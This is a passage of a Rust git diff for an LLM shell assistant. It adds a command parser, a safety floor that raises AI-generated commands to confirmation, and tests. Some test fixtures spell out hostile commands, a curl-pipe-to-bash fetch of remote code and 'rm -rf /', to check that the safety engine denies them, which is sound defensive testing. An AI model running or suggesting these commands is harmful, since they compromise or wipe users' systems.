snapshot → compose_assist_on_127 → complete → parse. 
+ /// + /// # Errors + /// + /// Same as [`translate_nl`]. + pub async fn assist_on_127(&self, failed_argv: &[&str]) -> Result { + let snap = self.context_provider.snapshot(); + let req = self.composer.compose_assist_on_127(failed_argv, &snap)?; + let resp = self.client.complete(req).await?; + let argv = parse_command_response(&resp.text)?; + Ok(ProposedCommand::new( + argv, + CommandSource::AiGenerated, + resp.text, + )) + } +} + +// ── Tests ───────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + use crate::client::{LlmResponse, MockLlmClient}; + use logicshell_core::config::LlmConfig; + + fn mock_client_returning(text: &str) -> Arc { + let mut mock = MockLlmClient::new(); + let text = text.to_string(); + mock.expect_complete().returning(move |req| { + Ok(LlmResponse { + text: text.clone(), + model: req.model, + }) + }); + Arc::new(mock) + } + + fn error_client(err: LlmError) -> Arc { + let mut mock = MockLlmClient::new(); + // LlmError is Clone-able via the explicit impl in error module tests + let msg = err.to_string(); + mock.expect_complete() + .returning(move |_| Err(LlmError::Http(msg.clone()))); + Arc::new(mock) + } + + // ── LlmBridge::new ──────────────────────────────────────────────────────── + + #[test] + fn new_stores_model() { + let client = mock_client_returning("ls"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + assert_eq!(bridge.model(), "llama3"); + } + + #[test] + fn new_with_zero_cap_stores_model() { + let client = mock_client_returning("ls"); + let bridge = LlmBridge::new(client, "m", 0); + assert_eq!(bridge.model(), "m"); + } + + // ── LlmBridge::from_config ──────────────────────────────────────────────── + + #[test] + fn from_config_disabled_returns_error() { + let client = mock_client_returning("ls"); + let cfg = LlmConfig { + enabled: false, + ..LlmConfig::default() + }; + let result = LlmBridge::from_config(client, &cfg); + assert_eq!(result.unwrap_err(), 
LlmError::Disabled); + } + + #[test] + fn from_config_enabled_no_model_returns_error() { + let client = mock_client_returning("ls"); + let cfg = LlmConfig { + enabled: true, + model: None, + ..LlmConfig::default() + }; + let result = LlmBridge::from_config(client, &cfg); + assert_eq!(result.unwrap_err(), LlmError::ModelNotSpecified); + } + + #[test] + fn from_config_valid_stores_model() { + let client = mock_client_returning("ls"); + let cfg = LlmConfig { + enabled: true, + model: Some("mistral".into()), + ..LlmConfig::default() + }; + let bridge = LlmBridge::from_config(client, &cfg).unwrap(); + assert_eq!(bridge.model(), "mistral"); + } + + // ── translate_nl ────────────────────────────────────────────────────────── + + #[tokio::test] + async fn translate_nl_returns_proposed_command() { + let client = mock_client_returning("ls -la"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("list files").await.unwrap(); + assert_eq!(proposed.argv, vec!["ls", "-la"]); + } + + #[tokio::test] + async fn translate_nl_source_is_ai_generated() { + let client = mock_client_returning("pwd"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge + .translate_nl("print working directory") + .await + .unwrap(); + assert_eq!(proposed.source, CommandSource::AiGenerated); + } + + #[tokio::test] + async fn translate_nl_raw_response_preserved() { + let client = mock_client_returning("ls -lhS"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("list files by size").await.unwrap(); + assert_eq!(proposed.raw_response, "ls -lhS"); + } + + #[tokio::test] + async fn translate_nl_strips_code_fence_in_response() { + let client = mock_client_returning("```bash\nls -la\n```"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("list files").await.unwrap(); + assert_eq!(proposed.argv, vec!["ls", "-la"]); + } + + #[tokio::test] + async fn 
translate_nl_context_too_large_propagated() { + let client = mock_client_returning("ls"); + let bridge = LlmBridge::new(client, "m", 10); // cap too small + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::ContextTooLarge { .. }))); + } + + #[tokio::test] + async fn translate_nl_http_error_propagated_for_degradation() { + let client = error_client(LlmError::Http("connection refused".into())); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::Http(_)))); + } + + #[tokio::test] + async fn translate_nl_parse_error_on_empty_response() { + let client = mock_client_returning(""); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::Parse(_)))); + } + + #[tokio::test] + async fn translate_nl_git_command() { + let client = mock_client_returning("git log --oneline -10"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("show last 10 commits").await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "log", "--oneline", "-10"]); + } + + // ── assist_on_127 ───────────────────────────────────────────────────────── + + #[tokio::test] + async fn assist_on_127_returns_proposed_command() { + let client = mock_client_returning("git status"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&["gti", "status"]).await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "status"]); + } + + #[tokio::test] + async fn assist_on_127_source_is_ai_generated() { + let client = mock_client_returning("git status"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&["gti", "status"]).await.unwrap(); + assert_eq!(proposed.source, CommandSource::AiGenerated); + } + + #[tokio::test] + async fn 
assist_on_127_raw_response_preserved() { + let client = mock_client_returning("docker ps"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&["docekr", "ps"]).await.unwrap(); + assert_eq!(proposed.raw_response, "docker ps"); + } + + #[tokio::test] + async fn assist_on_127_empty_argv_works() { + let client = mock_client_returning("ls"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&[]).await.unwrap(); + assert!(!proposed.argv.is_empty()); + } + + #[tokio::test] + async fn assist_on_127_http_error_propagated() { + let client = error_client(LlmError::Http("timeout".into())); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.assist_on_127(&["gti", "status"]).await; + assert!(matches!(result, Err(LlmError::Http(_)))); + } + + #[tokio::test] + async fn assist_on_127_context_too_large_propagated() { + let client = mock_client_returning("git status"); + let bridge = LlmBridge::new(client, "m", 10); // tiny cap + let result = bridge.assist_on_127(&["gti"]).await; + assert!(matches!(result, Err(LlmError::ContextTooLarge { .. }))); + } + + #[tokio::test] + async fn assist_on_127_parse_error_on_empty_response() { + let client = mock_client_returning(" "); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.assist_on_127(&["cmd"]).await; + assert!(matches!(result, Err(LlmError::Parse(_)))); + } +} diff --git a/logicshell-llm/src/lib.rs b/logicshell-llm/src/lib.rs index 4cc2b88..19bf489 100644 --- a/logicshell-llm/src/lib.rs +++ b/logicshell-llm/src/lib.rs @@ -1,15 +1,20 @@ // logicshell-llm: LLM bridge, context, composer, Ollama client // Enable HTTP backend with the `ollama` feature flag. 
+pub mod bridge; pub mod client; pub mod context; pub mod error; +pub mod parser; pub mod prompt; +pub mod proposed; #[cfg(feature = "ollama")] pub mod ollama; +pub use bridge::LlmBridge; pub use client::{LlmClient, LlmRequest, LlmResponse}; pub use context::{SystemContextProvider, SystemContextSnapshot}; pub use error::LlmError; pub use prompt::PromptComposer; +pub use proposed::{apply_ai_safety_floor, CommandSource, ProposedCommand}; diff --git a/logicshell-llm/src/parser.rs b/logicshell-llm/src/parser.rs new file mode 100644 index 0000000..3cee726 --- /dev/null +++ b/logicshell-llm/src/parser.rs @@ -0,0 +1,360 @@ +// Command response parser — Phase 10, LLM Module PRD §5.5 +// +// Converts raw LLM response text into an argv vec suitable for dispatch. +// The pipeline: +// 1. Strip optional markdown code fence (```bash...``` or ```...```) +// 2. Take the first non-empty line (models sometimes emit preamble) +// 3. Shell-tokenize: whitespace, single-quotes (literal), double-quotes +// (backslash-escaped), backslash escapes outside quotes. +// +// Returns `LlmError::Parse` on empty/whitespace-only responses and on +// unterminated quoted strings. + +use crate::error::LlmError; + +/// Parse a raw LLM response into an argv vector. +/// +/// Strips code fences, takes the first non-empty line, and tokenizes it +/// using POSIX-style shell quoting rules (single-quotes, double-quotes, +/// backslash escapes). +/// +/// # Errors +/// +/// - `LlmError::Parse` when the response is empty after stripping. +/// - `LlmError::Parse` when the response contains an unterminated quote. 
+pub fn parse_command_response(text: &str) -> Result, LlmError> { + let stripped = strip_code_fence(text); + + let first_line = stripped + .lines() + .map(str::trim) + .find(|l| !l.is_empty()) + .unwrap_or(""); + + if first_line.is_empty() { + return Err(LlmError::Parse( + "LLM response contained no parseable command".into(), + )); + } + + tokenize(first_line) +} + +/// Strip a leading ```` ``` ```` (with optional language tag) and trailing +/// ```` ``` ```` from `text`. Returns a trimmed `&str` slice of the interior +/// content. If no fence is found the input is returned trimmed. +fn strip_code_fence(text: &str) -> &str { + let trimmed = text.trim(); + if let Some(rest) = trimmed.strip_prefix("```") { + // Skip an optional language tag that runs to the first newline. + let after_tag = if let Some(nl) = rest.find('\n') { + &rest[nl + 1..] + } else { + rest + }; + // Strip the trailing ``` if present. + if let Some(end) = after_tag.rfind("```") { + return after_tag[..end].trim(); + } + // Malformed fence: return the raw interior anyway. + return after_tag.trim(); + } + trimmed +} + +/// POSIX-style shell tokenizer for a single command line. +/// +/// Supported: +/// - Unquoted tokens split on ASCII whitespace +/// - `'...'` single-quotes — literal content, no escaping inside +/// - `"..."` double-quotes — backslash-escape inside (`\\`, `\"`, `\n`, etc.) +/// - `\x` outside quotes — the character `x` is taken literally +/// +/// Returns `Err(())` on unterminated quotes; callers map this to `LlmError::Parse`. 
+fn tokenize(s: &str) -> Result, LlmError> { + let mut tokens: Vec = Vec::new(); + let mut current = String::new(); + let mut in_token = false; + let mut chars = s.chars().peekable(); + + while let Some(c) = chars.next() { + match c { + ' ' | '\t' => { + if in_token { + tokens.push(current.clone()); + current.clear(); + in_token = false; + } + } + '\'' => { + in_token = true; + loop { + match chars.next() { + Some('\'') => break, + Some(ch) => current.push(ch), + None => { + return Err(LlmError::Parse( + "unterminated single-quote in LLM response".into(), + )) + } + } + } + } + '"' => { + in_token = true; + loop { + match chars.next() { + Some('"') => break, + Some('\\') => match chars.next() { + Some(escaped) => current.push(escaped), + None => { + return Err(LlmError::Parse( + "unterminated escape in double-quoted string".into(), + )) + } + }, + Some(ch) => current.push(ch), + None => { + return Err(LlmError::Parse( + "unterminated double-quote in LLM response".into(), + )) + } + } + } + } + '\\' => { + in_token = true; + if let Some(escaped) = chars.next() { + current.push(escaped); + } + } + _ => { + in_token = true; + current.push(c); + } + } + } + + if in_token { + tokens.push(current); + } + + if tokens.is_empty() { + return Err(LlmError::Parse( + "LLM response tokenized to empty argv".into(), + )); + } + + Ok(tokens) +} + +// ── Tests ───────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + + // ── strip_code_fence ────────────────────────────────────────────────────── + + #[test] + fn strip_fence_no_fence_returns_trimmed() { + assert_eq!(strip_code_fence("ls -la"), "ls -la"); + } + + #[test] + fn strip_fence_with_bash_tag() { + let input = "```bash\nls -la\n```"; + assert_eq!(strip_code_fence(input), "ls -la"); + } + + #[test] + fn strip_fence_without_language_tag() { + let input = "```\nls -la\n```"; + assert_eq!(strip_code_fence(input), "ls -la"); + } + + #[test] + fn 
strip_fence_multiline_takes_interior() { + let input = "```bash\nls -la\necho done\n```"; + let result = strip_code_fence(input); + assert!(result.contains("ls -la")); + assert!(result.contains("echo done")); + } + + #[test] + fn strip_fence_trims_surrounding_whitespace() { + assert_eq!(strip_code_fence(" ls -la "), "ls -la"); + } + + #[test] + fn strip_fence_empty_string() { + assert_eq!(strip_code_fence(""), ""); + } + + #[test] + fn strip_fence_only_whitespace() { + assert_eq!(strip_code_fence(" "), ""); + } + + // ── tokenize ────────────────────────────────────────────────────────────── + + #[test] + fn tokenize_simple_command() { + assert_eq!(tokenize("ls").unwrap(), vec!["ls"]); + } + + #[test] + fn tokenize_command_with_args() { + assert_eq!(tokenize("ls -la").unwrap(), vec!["ls", "-la"]); + } + + #[test] + fn tokenize_multiple_spaces_collapsed() { + assert_eq!(tokenize("ls -la").unwrap(), vec!["ls", "-la"]); + } + + #[test] + fn tokenize_single_quoted_space() { + assert_eq!( + tokenize("echo 'hello world'").unwrap(), + vec!["echo", "hello world"] + ); + } + + #[test] + fn tokenize_double_quoted_space() { + assert_eq!( + tokenize(r#"echo "hello world""#).unwrap(), + vec!["echo", "hello world"] + ); + } + + #[test] + fn tokenize_double_quote_with_backslash_escape() { + assert_eq!( + tokenize(r#"echo "hello \"world\"""#).unwrap(), + vec!["echo", r#"hello "world""#] + ); + } + + #[test] + fn tokenize_backslash_space() { + assert_eq!( + tokenize(r#"echo hello\ world"#).unwrap(), + vec!["echo", "hello world"] + ); + } + + #[test] + fn tokenize_tab_as_separator() { + assert_eq!(tokenize("ls\t-la").unwrap(), vec!["ls", "-la"]); + } + + #[test] + fn tokenize_unterminated_single_quote_is_error() { + assert!(tokenize("echo 'hello").is_err()); + } + + #[test] + fn tokenize_unterminated_double_quote_is_error() { + assert!(tokenize(r#"echo "hello"#).is_err()); + } + + #[test] + fn tokenize_empty_string_is_error() { + assert!(tokenize("").is_err()); + } + + #[test] + fn 
tokenize_whitespace_only_is_error() { + assert!(tokenize(" ").is_err()); + } + + #[test] + fn tokenize_cmd_with_flags_and_path() { + assert_eq!( + tokenize("find /tmp -name '*.log' -type f").unwrap(), + vec!["find", "/tmp", "-name", "*.log", "-type", "f"] + ); + } + + #[test] + fn tokenize_git_commit_with_message() { + assert_eq!( + tokenize(r#"git commit -m "fix: typo""#).unwrap(), + vec!["git", "commit", "-m", "fix: typo"] + ); + } + + // ── parse_command_response ──────────────────────────────────────────────── + + #[test] + fn parse_simple_command() { + let result = parse_command_response("ls -la").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } + + #[test] + fn parse_takes_first_non_empty_line() { + let result = parse_command_response("\nls -la\necho done\n").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } + + #[test] + fn parse_strips_bash_fence() { + let result = parse_command_response("```bash\nls -la\n```").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } + + #[test] + fn parse_strips_plain_fence() { + let result = parse_command_response("```\nls -la\n```").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } + + #[test] + fn parse_empty_response_is_error() { + assert!(parse_command_response("").is_err()); + } + + #[test] + fn parse_whitespace_only_is_error() { + assert!(parse_command_response(" \n\n ").is_err()); + } + + #[test] + fn parse_error_is_parse_variant() { + let e = parse_command_response("").unwrap_err(); + assert!(matches!(e, LlmError::Parse(_))); + } + + #[test] + fn parse_unterminated_quote_is_parse_error() { + let e = parse_command_response("echo 'hello").unwrap_err(); + assert!(matches!(e, LlmError::Parse(_))); + } + + #[test] + fn parse_command_with_quoted_args() { + let result = parse_command_response(r#"grep -r "TODO" src/"#).unwrap(); + assert_eq!(result, vec!["grep", "-r", "TODO", "src/"]); + } + + #[test] + fn parse_git_log_command() { + let result = parse_command_response("git log --oneline -10").unwrap(); + 
assert_eq!(result, vec!["git", "log", "--oneline", "-10"]); + } + + #[test] + fn parse_single_word_command() { + let result = parse_command_response("pwd").unwrap(); + assert_eq!(result, vec!["pwd"]); + } + + #[test] + fn parse_trims_leading_trailing_whitespace() { + let result = parse_command_response(" ls -la ").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } +} diff --git a/logicshell-llm/src/proposed.rs b/logicshell-llm/src/proposed.rs new file mode 100644 index 0000000..9f85a2a --- /dev/null +++ b/logicshell-llm/src/proposed.rs @@ -0,0 +1,220 @@ +// ProposedCommand + CommandSource — Phase 10, LLM Module PRD §5.6 +// +// A `ProposedCommand` wraps an argv produced by the LLM bridge and records +// its provenance. `CommandSource::AiGenerated` triggers a safety-floor raise: +// the safety engine's `Allow` decision is promoted to `Confirm` so AI-produced +// commands always require explicit user confirmation before dispatch. + +use logicshell_core::config::{SafetyConfig, SafetyMode}; +use logicshell_core::{Decision, RiskAssessment, SafetyPolicyEngine}; + +/// Provenance of a command proposed for dispatch. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum CommandSource { + /// Command was produced by an AI language model. + AiGenerated, +} + +/// A command candidate produced by the LLM bridge, ready for safety evaluation +/// and user confirmation before dispatch. +#[derive(Debug, Clone, PartialEq)] +pub struct ProposedCommand { + /// Tokenized argument vector suitable for dispatch. + pub argv: Vec, + /// How this command was produced. + pub source: CommandSource, + /// Raw text returned by the model (for display / audit). + pub raw_response: String, +} + +impl ProposedCommand { + /// Construct a new `ProposedCommand`. 
+ pub fn new(argv: Vec, source: CommandSource, raw_response: impl Into) -> Self { + Self { + argv, + source, + raw_response: raw_response.into(), + } + } + + /// Evaluate this command through the safety policy engine, then apply the + /// AI safety floor: `Allow` is raised to `Confirm` for `AiGenerated` commands + /// so that human confirmation is always required before executing AI output. + /// + /// `Confirm` and `Deny` decisions are returned unchanged. + pub fn evaluate_safety( + &self, + safety_mode: SafetyMode, + safety_config: &SafetyConfig, + ) -> (RiskAssessment, Decision) { + let engine = SafetyPolicyEngine::new(safety_mode, safety_config); + let refs: Vec<&str> = self.argv.iter().map(|s| s.as_str()).collect(); + let (assessment, decision) = engine.evaluate(&refs); + let final_decision = apply_ai_safety_floor(decision, &self.source); + (assessment, final_decision) + } +} + +/// Raise a safety `Decision` to the minimum appropriate for AI-generated output. +/// +/// AI-generated commands receive a raised floor: `Allow` → `Confirm`. +/// `Confirm` and `Deny` are unaffected. Non-AI sources are unaffected. 
+pub fn apply_ai_safety_floor(decision: Decision, source: &CommandSource) -> Decision { + match source { + CommandSource::AiGenerated => match decision { + Decision::Allow => Decision::Confirm, + d => d, + }, + } +} + +// ── Tests ───────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + use logicshell_core::config::SafetyConfig; + + // ── CommandSource ───────────────────────────────────────────────────────── + + #[test] + fn command_source_debug() { + assert!(format!("{:?}", CommandSource::AiGenerated).contains("AiGenerated")); + } + + #[test] + fn command_source_clone_eq() { + let a = CommandSource::AiGenerated; + assert_eq!(a.clone(), CommandSource::AiGenerated); + } + + // ── ProposedCommand::new ────────────────────────────────────────────────── + + #[test] + fn new_stores_fields() { + let p = ProposedCommand::new( + vec!["ls".into(), "-la".into()], + CommandSource::AiGenerated, + "ls -la", + ); + assert_eq!(p.argv, vec!["ls", "-la"]); + assert_eq!(p.source, CommandSource::AiGenerated); + assert_eq!(p.raw_response, "ls -la"); + } + + #[test] + fn new_empty_argv() { + let p = ProposedCommand::new(vec![], CommandSource::AiGenerated, ""); + assert!(p.argv.is_empty()); + } + + #[test] + fn proposed_command_clone_eq() { + let p = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + assert_eq!(p.clone(), p); + } + + #[test] + fn proposed_command_partial_eq() { + let a = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + let b = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + let c = ProposedCommand::new(vec!["pwd".into()], CommandSource::AiGenerated, "pwd"); + assert_eq!(a, b); + assert_ne!(a, c); + } + + #[test] + fn proposed_command_debug() { + let p = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + assert!(format!("{p:?}").contains("ProposedCommand")); + } + + // ── apply_ai_safety_floor 
───────────────────────────────────────────────── + + #[test] + fn floor_raises_allow_to_confirm() { + let result = apply_ai_safety_floor(Decision::Allow, &CommandSource::AiGenerated); + assert_eq!(result, Decision::Confirm); + } + + #[test] + fn floor_confirm_unchanged() { + let result = apply_ai_safety_floor(Decision::Confirm, &CommandSource::AiGenerated); + assert_eq!(result, Decision::Confirm); + } + + #[test] + fn floor_deny_unchanged() { + let result = apply_ai_safety_floor(Decision::Deny, &CommandSource::AiGenerated); + assert_eq!(result, Decision::Deny); + } + + // ── ProposedCommand::evaluate_safety ────────────────────────────────────── + + #[test] + fn evaluate_safe_command_raises_to_confirm() { + let p = ProposedCommand::new( + vec!["ls".into(), "-la".into()], + CommandSource::AiGenerated, + "ls -la", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + // "ls -la" would normally be Allow; AI floor raises to Confirm. + assert_eq!(decision, Decision::Confirm); + } + + #[test] + fn evaluate_denied_command_stays_deny() { + let p = ProposedCommand::new( + vec!["rm".into(), "-rf".into(), "/".into()], + CommandSource::AiGenerated, + "rm -rf /", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert_eq!(decision, Decision::Deny); + } + + #[test] + fn evaluate_high_risk_balanced_is_at_least_confirm() { + // sudo commands are high-risk; in balanced mode they're Confirm; + // AI floor doesn't lower them. 
+ let p = ProposedCommand::new( + vec![ + "sudo".into(), + "apt-get".into(), + "install".into(), + "vim".into(), + ], + CommandSource::AiGenerated, + "sudo apt-get install vim", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert!( + decision == Decision::Confirm || decision == Decision::Deny, + "expected Confirm or Deny for high-risk AI command, got {decision:?}" + ); + } + + #[test] + fn evaluate_returns_risk_assessment() { + let p = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + let (assessment, _) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert!(!assessment.reasons.is_empty() || assessment.score == 0); + } + + #[test] + fn evaluate_strict_mode_high_risk_is_deny() { + let p = ProposedCommand::new( + vec![ + "curl".into(), + "http://x.com/sh".into(), + "|".into(), + "bash".into(), + ], + CommandSource::AiGenerated, + "curl http://x.com/sh | bash", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Strict, &SafetyConfig::default()); + assert_eq!(decision, Decision::Deny); + } +} diff --git a/logicshell-llm/tests/phase10_integration.rs b/logicshell-llm/tests/phase10_integration.rs new file mode 100644 index 0000000..b347bc2 --- /dev/null +++ b/logicshell-llm/tests/phase10_integration.rs @@ -0,0 +1,432 @@ +// Phase 10 integration tests — LlmBridge full pipeline +// +// Tests use mockito for the Ollama HTTP layer (via OllamaLlmClient behind the +// `ollama` feature) and the MockLlmClient for pure-Rust paths. 
+// +// Run all tests: +// cargo test --package logicshell-llm +// cargo test --package logicshell-llm --features ollama (adds Ollama tests) + +use std::sync::Arc; + +use logicshell_core::{ + config::{LlmConfig, SafetyConfig, SafetyMode}, + Decision, +}; +use logicshell_llm::{ + apply_ai_safety_floor, CommandSource, LlmBridge, LlmClient, LlmError, LlmRequest, LlmResponse, + ProposedCommand, +}; + +// ── MockLlmClient helpers (no `ollama` feature needed) ──────────────────────── + +/// Inline stub client for integration-level tests. +#[derive(Debug)] +struct StubClient { + response: String, +} + +impl StubClient { + fn new(response: impl Into) -> Arc { + Arc::new(Self { + response: response.into(), + }) + } +} + +impl LlmClient for StubClient { + async fn complete(&self, req: LlmRequest) -> Result { + Ok(LlmResponse { + text: self.response.clone(), + model: req.model, + }) + } +} + +#[derive(Debug)] +struct ErrorClient; + +impl LlmClient for ErrorClient { + async fn complete(&self, _req: LlmRequest) -> Result { + Err(LlmError::Http("connection refused".into())) + } +} + +// ── LlmBridge::translate_nl integration ────────────────────────────────────── + +#[tokio::test] +async fn translate_nl_returns_ai_generated_source() { + let bridge = LlmBridge::new(StubClient::new("ls -la"), "llama3", 8_000); + let proposed = bridge.translate_nl("list files").await.unwrap(); + assert_eq!(proposed.source, CommandSource::AiGenerated); +} + +#[tokio::test] +async fn translate_nl_full_pipeline_argv_parsed() { + let bridge = LlmBridge::new(StubClient::new("git log --oneline -20"), "llama3", 8_000); + let proposed = bridge.translate_nl("show recent commits").await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "log", "--oneline", "-20"]); +} + +#[tokio::test] +async fn translate_nl_raw_response_available_for_audit() { + let bridge = LlmBridge::new(StubClient::new("find . 
-name '*.rs'"), "llama3", 8_000); + let proposed = bridge.translate_nl("find all rust files").await.unwrap(); + assert_eq!(proposed.raw_response, "find . -name '*.rs'"); +} + +#[tokio::test] +async fn translate_nl_code_fence_stripped() { + let bridge = LlmBridge::new(StubClient::new("```bash\nls -lhS\n```"), "llama3", 8_000); + let proposed = bridge.translate_nl("list files by size").await.unwrap(); + assert_eq!(proposed.argv[0], "ls"); + assert!(proposed.argv.contains(&"-lhS".to_string())); +} + +#[tokio::test] +async fn translate_nl_graceful_degradation_on_http_error() { + let bridge = LlmBridge::new(Arc::new(ErrorClient), "llama3", 8_000); + let result = bridge.translate_nl("list files").await; + assert!( + matches!(result, Err(LlmError::Http(_))), + "unreachable daemon must return Http error for graceful degradation" + ); +} + +#[tokio::test] +async fn translate_nl_context_too_large_propagated() { + let bridge = LlmBridge::new(StubClient::new("ls"), "m", 5); + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::ContextTooLarge { .. 
}))); +} + +#[tokio::test] +async fn translate_nl_empty_response_parse_error() { + let bridge = LlmBridge::new(StubClient::new(""), "llama3", 8_000); + let result = bridge.translate_nl("do something").await; + assert!(matches!(result, Err(LlmError::Parse(_)))); +} + +// ── LlmBridge::assist_on_127 integration ──────────────────────────────────── + +#[tokio::test] +async fn assist_on_127_suggests_corrected_command() { + let bridge = LlmBridge::new(StubClient::new("git status"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&["gti", "status"]).await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "status"]); +} + +#[tokio::test] +async fn assist_on_127_source_is_ai_generated() { + let bridge = LlmBridge::new(StubClient::new("docker ps"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&["docekr", "ps"]).await.unwrap(); + assert_eq!(proposed.source, CommandSource::AiGenerated); +} + +#[tokio::test] +async fn assist_on_127_graceful_degradation_on_http_error() { + let bridge = LlmBridge::new(Arc::new(ErrorClient), "llama3", 8_000); + let result = bridge.assist_on_127(&["gti", "status"]).await; + assert!( + matches!(result, Err(LlmError::Http(_))), + "HTTP error must be propagated for caller to fall back" + ); +} + +#[tokio::test] +async fn assist_on_127_single_word_typo() { + let bridge = LlmBridge::new(StubClient::new("cargo"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&["crago"]).await.unwrap(); + assert_eq!(proposed.argv, vec!["cargo"]); +} + +#[tokio::test] +async fn assist_on_127_empty_failed_argv_still_returns_proposal() { + let bridge = LlmBridge::new(StubClient::new("ls"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&[]).await.unwrap(); + assert!(!proposed.argv.is_empty()); +} + +// ── from_config integration ─────────────────────────────────────────────────── + +#[test] +fn bridge_from_config_disabled_is_error() { + let cfg = LlmConfig { + enabled: false, + ..LlmConfig::default() + }; + let result = 
LlmBridge::from_config(StubClient::new("ls"), &cfg);
    assert_eq!(result.unwrap_err(), LlmError::Disabled);
}

// Bridge construction must fail fast when config enables LLM but names no model.
#[test]
fn bridge_from_config_no_model_is_error() {
    let cfg = LlmConfig {
        enabled: true,
        model: None,
        ..LlmConfig::default()
    };
    let result = LlmBridge::from_config(StubClient::new("ls"), &cfg);
    assert_eq!(result.unwrap_err(), LlmError::ModelNotSpecified);
}

// Happy path: enabled config + model yields a working NL→command pipeline.
#[tokio::test]
async fn bridge_from_config_valid_pipeline_works() {
    let cfg = LlmConfig {
        enabled: true,
        model: Some("llama3".into()),
        ..LlmConfig::default()
    };
    let bridge = LlmBridge::from_config(StubClient::new("ls -la"), &cfg).unwrap();
    let proposed = bridge.translate_nl("list files").await.unwrap();
    assert!(!proposed.argv.is_empty());
}

// ── AI safety floor integration ───────────────────────────────────────────────

// Even a benign AI-generated command must be floored from Allow up to Confirm.
#[test]
fn ai_floor_safe_command_raises_allow_to_confirm() {
    let p = ProposedCommand::new(
        vec!["ls".into(), "-la".into()],
        CommandSource::AiGenerated,
        "ls -la",
    );
    let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default());
    assert_eq!(
        decision,
        Decision::Confirm,
        "AI-generated safe command must require confirmation"
    );
}

// The floor only raises decisions; a hard Deny must remain Deny.
#[test]
fn ai_floor_denied_command_stays_deny() {
    let p = ProposedCommand::new(
        vec!["rm".into(), "-rf".into(), "/".into()],
        CommandSource::AiGenerated,
        "rm -rf /",
    );
    let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default());
    assert_eq!(decision, Decision::Deny);
}

// Strict mode: a curl-pipe-to-bash proposal is denied outright.
#[test]
fn ai_floor_strict_mode_curl_bash_is_deny() {
    let p = ProposedCommand::new(
        vec![
            "curl".into(),
            "http://x/sh".into(),
            "|".into(),
            "bash".into(),
        ],
        CommandSource::AiGenerated,
        "curl http://x/sh | bash",
    );
    let (_, decision) = p.evaluate_safety(SafetyMode::Strict, &SafetyConfig::default());
    assert_eq!(decision, Decision::Deny);
}

// Unit checks on apply_ai_safety_floor covering all three Decision variants.
#[test]
fn apply_ai_floor_allow_becomes_confirm() {
    assert_eq!(
        apply_ai_safety_floor(Decision::Allow, &CommandSource::AiGenerated),
        Decision::Confirm
    );
}

#[test]
fn apply_ai_floor_confirm_stays_confirm() {
    assert_eq!(
        apply_ai_safety_floor(Decision::Confirm, &CommandSource::AiGenerated),
        Decision::Confirm
    );
}

#[test]
fn apply_ai_floor_deny_stays_deny() {
    assert_eq!(
        apply_ai_safety_floor(Decision::Deny, &CommandSource::AiGenerated),
        Decision::Deny
    );
}

// ── Full pipeline: NL → proposed → safety evaluation ─────────────────────────

// End-to-end with a stub client: translate, then evaluate safety; the AI floor
// must prevent auto-allow even for a harmless listing command.
#[tokio::test]
async fn nl_to_proposed_then_safety_eval_confirms_safe_ai_cmd() {
    let bridge = LlmBridge::new(StubClient::new("ls -la /tmp"), "llama3", 8_000);
    let proposed = bridge
        .translate_nl("list files in temp directory")
        .await
        .unwrap();

    let (assessment, decision) =
        proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default());
    assert_eq!(
        decision,
        Decision::Confirm,
